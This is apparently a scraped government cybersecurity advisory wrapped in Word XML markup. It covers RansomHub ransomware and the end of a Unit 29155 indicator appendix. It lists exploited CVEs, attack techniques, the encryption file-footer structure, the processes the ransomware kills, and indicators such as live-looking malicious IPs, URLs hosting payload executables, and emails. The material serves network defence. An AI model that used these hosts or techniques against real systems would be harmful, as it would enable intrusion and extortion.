Wqxpgvsgvhygmfbziucxcuh.dll 246d9f9831b125ea7e6ef21bc4c8a0ca dea3ae8225913dd98148fc86cfc3bcbe Xgcpgrxhchgwz.dll 9c695be3703194fdb71c212a0832bcf3 8744cec7547b1e73705c10a264e28e08 Xgkepoc.dll 69e58c5ee69f5e5e8a58f4afdd59adfe d43446b4a22a597b93b559821ee5ac9b Xlfthpiq.dll 540ee8e39150c539fea582b0e77be7b0 3fe96ff4a5ef0f5346ce645a2a893597 Xlocky.dll 0a2affa6d895baab087b84e93145da35 246f31c86bbbe7f65c0126cf4a1a947a Xqblktvxmnxrzwiuqdfxzrd.dll 569c1d31f4c7ec7701d8e4e51b59fe85 5eaa7e812733a5c8cda734fab2f752d5 Xykqrksoqqgyuckfc.dll 09a2d85e809d36bff82bd5ab773980a3 96964aed18f65a7acae632f358a093f6 Yawyjonk.dll 3ccf799ff208981349cee4fb1a1cf88c 4e9c55c6fe25d61ca4394de794546fab Yrknbt.dll 6154760e602bd71192d93f72fbdb486e 94bf96b76c2a092de8962496ce35deaf Yvbmuigfihprdxgiirp.dll b0d0a23766fa64ece9315f37b28bb4c0 1e22d64f263e8ea4b2d37dcd9b7c3012 Ywrovtjimixpmizuln.dll ca43a241042b5fcc305393765ae18e69 28d571ddb5c04d065dfe1be9604663ba Zfgdccnwnee.dll 251f3a4757d9e4de0499cc30c0bc00a9 755dac7edd17fbf5b5c449dd06c02e14 Zkuxhxwbvifejn.dll 9d7ab8b0aa669125d9a5adc4f46c56f3 af277ae0fbf6cc20f887696ea4756d46 Zsdflpivel.dll a9c9c0be8eca3b575c24da0fcf1af1a9 1cac5c0cb8801e8730447023270d8d56 Appendix B: Indicators of Compromise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27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.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27: IP Addresses Associated with Unit 29155 Infrastructure IP Address 5.226.139[.]66 45.141.87[.]11 46.101.242[.]222 62.173.140[.]223 79.124.8[.]66 90.131.156[.]107 112.51.253[.]153 112.132.218[.]45 154.21.20[.]82 179.43.133[.]202 179.43.142[.]42 179.43.162[.]55 179.43.175[.]38 179.43.175[.]108 (data exfiltration site) 179.43.176[.]60 179.43.187[.]47 179.43.189[.]218 185.245.84[.]227 185.245.85[.]251 194.26.29[.]84 194.26.29[.]95 194.26.29[.]98 194.26.29[.]251</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Threat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host.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28: Domains Hosting Jump Host Tooling Domain Name interlinks[.]top https://3proxy[.]ru https://ngrok[.]com (Note: This domain is a legitimate service leveraged for malicious purposes by Unit 29155 cyber actors and should be investigated prior to blocking.) https://nssm[.]cc</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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.09.05 20:52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#StopRansomware: RansomHub Ransomware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Release Date August 29, 2024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Alert Code AA24-242A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Actions to take today to mitigate cyber threats from ransomware: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Install updates for operating systems, software, and firmware as soon as they are released.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require phishing-resistant MFA (i.e., non-SMS text based) for as many services as possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Train users to recognize and report phishing attempts.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Summary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Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.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Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant-formerly known as Cyclops and Knight- that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).</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Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.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affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting the network compromise. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion URL (reachable through the Tor browser). The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.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authoring organizations encourage network defenders to implement the recommendations in the Mitigations section of this cybersecurity advisory to reduce the likelihood and impact of ransomware incidents.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Download the PDF version of this report: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AA24-242A #StopRansomware: RansomHub Ransomware (PDF, 714.48 KB )</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a downloadable copy of IOCs, see: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AA24-242A STIX XML (XML, 133.74 KB )</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AA24-242A STIX JSON (JSON, 109.41 KB ) Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 15. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors' activity mapped to MITRE ATT&amp;CK tactics and techniques. Initial Access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RansomHub affiliates typically compromise internet facing systems and user endpoints by using methods such as phishing emails [T1566], exploitation of known vulnerabilities [T1190], and password spraying [T1110.003]. Password spraying targets accounts compromised through data breaches. Proof-of- concept exploits are obtained from sources such as ExploitDB and GitHub [T1588.005]. Exploits based on the following CVEs have been observed: CVE-2023-3519 (CWE-94) Citrix ADC (NetScaler) Remote Code Execution. A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the NSPPE (NetScaler Packet Processing Engine) process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2023-27997 (CWE-787 | CWE-122) A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2023-46604 (CWE-502) The Java OpenWire protocol marshaller, such as in Apache ActiveMQ, is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to open either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Upgrading both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 fixes this issue.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CVE-2023-22515 A vulnerability in publicly accessible Confluence Data Center and Server instances that allows the creation of unauthorized Confluence administrator accounts and access to Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2023-46747 (CWE-306 | CWE-288) Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2023-48788 (CWE-89) An improper neutralization of special elements used in an SQL command (SQL injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2 and FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2017-0144 The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, also known as "Windows SMB Remote Code Execution Vulnerability" [T1210]. CVE-2020-1472 An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2020-0787 This vulnerability was also potentially exploited along with the Zerologon privilege escalation vulnerability. Discovery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RansomHub affiliates conduct network scanning with tools such as AngryIPScanner, Nmap, and PowerShell-based living off the land methods with PowerShell to conduct network scanning [T1018][T1046][T1059.001]. Defense Evasion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Cybersecurity researchers have observed affiliates renaming the ransomware executable with innocuous file names, such as Windows.exe, left on the user's desktop (C:\Users\%USERNAME%\Desktop) or downloads (C:\Users\%USERNAME%\Downloads) [T1036]. The affiliates have also cleared Windows and Linux system logs to inhibit any potential incident response [T1070]. Affiliates used Windows Management Instrumentation [T1047] to disable antivirus products. In some instances, RansomHub-specific tools were deployed to disable endpoint detection and response (EDR) tooling [T1562.001]. Privilege Escalation and Lateral Movement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Following initial access, RansomHub affiliates created user accounts for persistence [T1136], reenabled disabled accounts [T1098], and used Mimikatz [S0002] on Windows systems to gather credentials [T1003] and escalate privileges to SYSTEM [T1068]. Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP) [T1021.001], PsExec [S0029], Anydesk [T1219], Connectwise, N-Able, Cobalt Strike [S0154], Metasploit, or other widely used command-and-control (C2) methods. Data Exfiltration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Data exfiltration methods depend heavily on the affiliate conducting the network compromise. The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods. Encryption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RansomHub ransomware has typically leveraged an Elliptic Curve Encryption algorithm called Curve 25519 to encrypt user accessible files on the system [T1486]. Curve 25519 uses a public/private key that is unique to each victim organization. To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes: "vmms.exe" "msaccess.exe" "mspub.exe" "svchost.exe" "vmcompute.exe" "notepad.exe" "ocautoupds.exe" "ocomm.exe" "ocssd.exe" "oracle.exe" "onenote.exe" "outlook.exe" "powerpnt.exe" "explorer.exe" "sql.exe" "steam.exe" "synctime.exe" "vmwp.exe" "thebat.exe" "thunderbird.exe" "visio.exe" "winword.exe" "wordpad.exe" "xfssvccon.exe" "TeamViewer.exe" "agntsvc.exe" "dbsnmp.exe" "dbeng50.exe" "encsvc.exe"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ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares.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RansomHub implements intermittent encryption, encrypting files in 0x100000 byte chunks and skipping every 0x200000 bytes of data in between encrypted chunks. Files smaller than 0x100000 bytes in size are completely encrypted. Files are appended with 58 (0x3A) bytes of data at the end. This data contains a value which is likely part of an encryption/decryption key. The structure of the appended 0x3A bytes is listed below with images from three different encrypted files.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 The first eight bytes are the size of the encrypted file.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next eight bytes are the size of encrypted blocks. If the entire file is encrypted, this section is all zeros. In this example, each encrypted section is 0x100000 bytes long, with 0x100000 bytes between each encrypted block. This number was observed changing based on the size of the encrypted file.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2: The size of encrypted blocks.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next two bytes were always seen to be 0x0001.</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3: The next two bytes are always 0x0001.</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next 32 bytes are the public encryption key for the file.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4: Public encryption key for the file.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next four bytes are a checksum value.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Figure 5: Checksum value.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last four bytes are always seen to be the sequence 0x00ABCDEF.</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6: The last four bytes.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ransomware executable does not typically encrypt executable files. A random file extension is added to file names and a ransom note generally titled How To Restore Your Files.txt is left on the compromised system. To further inhibit system recovery, the ransomware executable typically leverages the vssadmin.exe program to delete volume shadow copies [T1490]. Leveraged Tools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See Table 1 for publicly available tools and applications used by RansomHub affiliates. This includes legitimate tools repurposed for their operations.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Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.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 Tools Used by RansomHub Affiliates Tool Name Description BITSAdmin A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cobalt Strike [S0154] A penetration testing tool used by security professionals to test the security of networks and systems. RansomHub affiliates have used it to assist with lateral movement and file execution. Mimikatz [S0002] A tool that allows users to view and save authentication credentials such as Kerberos tickets. RansomHub affiliates have used it to aid privilege escalation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PSExec [S0029] A tool designed to run programs and execute commands on remote systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PowerShell Cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>RClone A command line program used to sync files with cloud storage services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Sliver A penetration testing toolset which allows for remote command and control of systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SMBExec A tool designed to manipulate SMB services for remote code execution.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Affiliates have used it to transfer data from a compromised network to actor-controlled accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CrackMapExec Pentest Toolset Kerberoast Kerberos Brute force and Exploitation Tool AngryIPScanner Network Scanner Indicators of Compromise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Disclaimer: Several of these IP addresses were first observed as early as 2020, although most date from 2022 or 2023 and have been historically linked to QakBot. The authoring organizations recommend organizations investigate or vet these IP addresses prior to taking action (such as blocking).</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See Table 2-Table 5 for IOCs obtained from FBI investigations.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2: Directory Structure TTPs Filename Description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C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\crackmapexec.exe CrackMapExec</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C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\kerbrute.exe Kerberoasting C:\Users\%USERNAME%\Downloads\Anydesk.exe Anydesk C2 C:\Users\%USERNAME%\Desktop\IamBatMan.exe Ransomware C:\Users\backupexec\Desktop\stealer_cli_v2.exe Info Stealer C:\Users\%USERNAME%\Downloads\nmap-7.94-setup.exe Nmap C:\Program Files (x86)\Nmap\nmap.exe Nmap C:\Users\%USERNAME%\Downloads\mimikatz_trunk\x64\mimikatz.exe Mimikatz C:\Users\backupexec\Downloads\x64\mimikatz.exe Mimikatz</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Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking. Many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.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3: Known IPs Related to Malicious Activity (2023-2024) IP Address 8.211.2[.]97 45.95.67[.]41 45.134.140[.]69 45.135.232[.]2 89.23.96[.]203 188.34.188[.]7 193.106.175[.]107 193.124.125[.]78 193.233.254[.]21</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Table 4: Known URLs Related to Malicious Activity (2023-2024) Web Requests http[:]//188.34.188[.]7/555 http[:]//188.34.188[.]7/555/ http[:]//188.34.188[.]7/555/amba16.ico http[:]//188.34.188[.]7/555/bcrypt.dll http[:]//188.34.188[.]7/555/CRYPTSP.dll http[:]//188.34.188[.]7/555/en http[:]//188.34.188[.]7/555/en-US http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe.Config http[:]//188.34.188[].7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.INI http[:]//89.23.96[.]203/ http[:]//89.23.96[.]203/333 http[:]//89.23.96[.]203/333/ http[:]//89.23.96[.]203/333/1.exe http[:]//89.23.96[.]203/333/1.exe.Config http[:]//89.23.96[.]203/333/10.exe http[:]//89.23.96[.]203/333/12.exe http[:]//89.23.96[.]203/333/12.exe.Config http[:]//89.23.96[.]203/333/2.exe http[:]//89.23.96[.]203/333/2.exe.Config http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe.Config http[:]//89.23.96[.]203/333/3.exe http[:]//89.23.96[.]203/333/3.exe.Config http[:]//89.23.96[.]203/333/4.exe http[:]//89.23.96[.]203/333/4.exe.Config http[:]//89.23.96[.]203/333/5.exe http[:]//89.23.96[.]203/333/5.exe.Config http[:]//89.23.96[.]203/333/6.exe http[:]//89.23.96[.]203/333/7.exe http[:]//89.23.96[.]203/333/8.exe http[:]//89.23.96[.]203/333/9.exe http[:]//89.23.96[.]203/333/92.exe http[:]//89.23.96[.]203/333/AmbaPDF.ico http[:]//89.23.96[.]203/333/ambapdf.ico.DLL http[:]//89.23.96[.]203/333/bcrypt.dll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http[:]//89.23.96[.]203/333/Cabinet.dll http[:]//89.23.96[.]203/333/CRYPTBASE.DLL http[:]//89.23.96[.]203/333/cryptnet.dll http[:]//89.23.96[.]203/333/CRYPTSP.dll http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe http[:]//89.23.96[.]203/333/DPAPI.DLL http[:]//89.23.96[.]203/333/en http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.dll http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.exe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http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll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http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe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http[:]//89.23.96[.]203/333/en-US http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.dll http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.exe http[:]//89.23.96[.]203/333/en- US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll http[:]//89.23.96[.]203/333/en- US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe http[:]//89.23.96[.]203/333/iertutil.dll http[:]//89.23.96[.]203/333/information.exe http[:]//89.23.96[.]203/333/information.exe.Config http[:]//89.23.96[.]203/333/information.INI http[:]//89.23.96[.]203/333/IPHLPAPI.DLL http[:]//89.23.96[.]203/333/mshtml.dll http[:]//89.23.96[.]203/333/msi.dll http[:]//89.23.96[.]203/333/SspiCli.dll http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe.Config http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe http[:]//89.23.96[.]203/333/urlmon.dll http[:]//89.23.96[.]203/333/USERENV.dll http[:]//89.23.96[.]203/333/webio.dll http[:]//89.23.96[.]203/333/winhttp.dll http[:]//89.23.96[.]203/333/WININET.dll http[:]//89.23.96[.]203/333/WINMM.dll http[:]//89.23.96[.]203/333/WINMMBASE.dll http[:]//89.23.96[.]203/333/winnlsres.dll http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe.Config http[:]//temp.sh/KnCqD/superloop.exe https[:]//grabify.link/Y33YXP https[:]//i.ibb.co/2KBydfw/112882618.png https[:]//i.ibb.co/4g6jH2J/2773036704.png https[:]//i.ibb.co/b1bZBpg/2615174623.png https[:]//i.ibb.co/Fxhyq6t/2077411869.png https[:]//i.ibb.co/HK0jV1G/534475006.png https[:]//i.ibb.co/nbMNnW4/2501108160.png https[:]//i.ibb.co/p1RCtpy/2681232755.png https[:]//i.ibb.co/SxQLwYm/1038436121.png https[:]//i.ibb.co/v1bn9ZK/369210627.png https[:]//i.ibb.co/V3Kj1c2/1154761258.png https[:]//i.ibb.co/X2FR8Kz/2113791011.png https[:]//i.ibb.com:443/V3Kj1c2/1154761258.png https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.css https[:]//12301230[.]co/npm/module.external/jquery.min.js https[:]//12301230[.]co/npm/module.external/moment.min.js https[:]//12301230[.]co/npm/module.external/client.min.js https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.js https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js https[:]//samuelelena[.]co/npm/module.external/jquery.min.js https[:]//samuelelena[.]co/npm/module.external/moment.min.js https[:]//samuelelena[.]co/npm/module.external/client.min.js https[:]//samuelelena[.]co/ http[:]//samuelelena[.]co/ https[:]//samuelelena[.]co/npm https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js http[:]//samuelelena[.]co/npm/ http[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js http[:]//samuelelena[.]co/npm/module.external/client.min.js https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor. https[:]//samuelelena[.]co/npm/module.external/jquery.min.js https[:]//samuelelena[.]co/npm/module.external https[:]//samuelelena[.]co/np https[:]/samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js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https[:]//samuelelena[.]co/npm/module[.]tripadvisor/module[.]tripadvisor[.]js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https[:]//samuelelena[.]co/npm/module[.]external/client.min.js https[:]//samuelelena[.]co/npm/module.external/jquery.min.js  http[:]//samuelelena[.]co:443/ http[:]//samuelelena[.]co/npm/module.external/jquery.min.js https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.css https[:]//40031[.]co/npm/module.external/jquery.min.js https[:]//40031[.]co/npm/module.external/moment.min.js https[:]//40031[.]co/npm/module.external/client.min.js https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.js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5: Emails Related to RansomHub (2023-2024) Email Addresses brahma2023[@]onionmail.org &lt;victim_organization_name&gt;[@]protonmail.com MITRE ATT&amp;CK Tactics and Techniques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See Table 6-Table 17 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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6: Resource Development Technique Title ID Use Obtain Capabilities: Exploits T1588.005 RansomHub affiliates may buy, steal, or download exploits that can be used during targeting.</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Table 7: Initial Access Technique Title ID Use Phishing T1566 RansomHub affiliates used mass phishing and spear-phishing emails to obtain initial access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exploit Public-Facing Application T1190 RansomHub affiliates may exploit known vulnerabilities to obtain initial access.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Technique Title ID Use Command and Scripting Interpreter T1059.001 RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
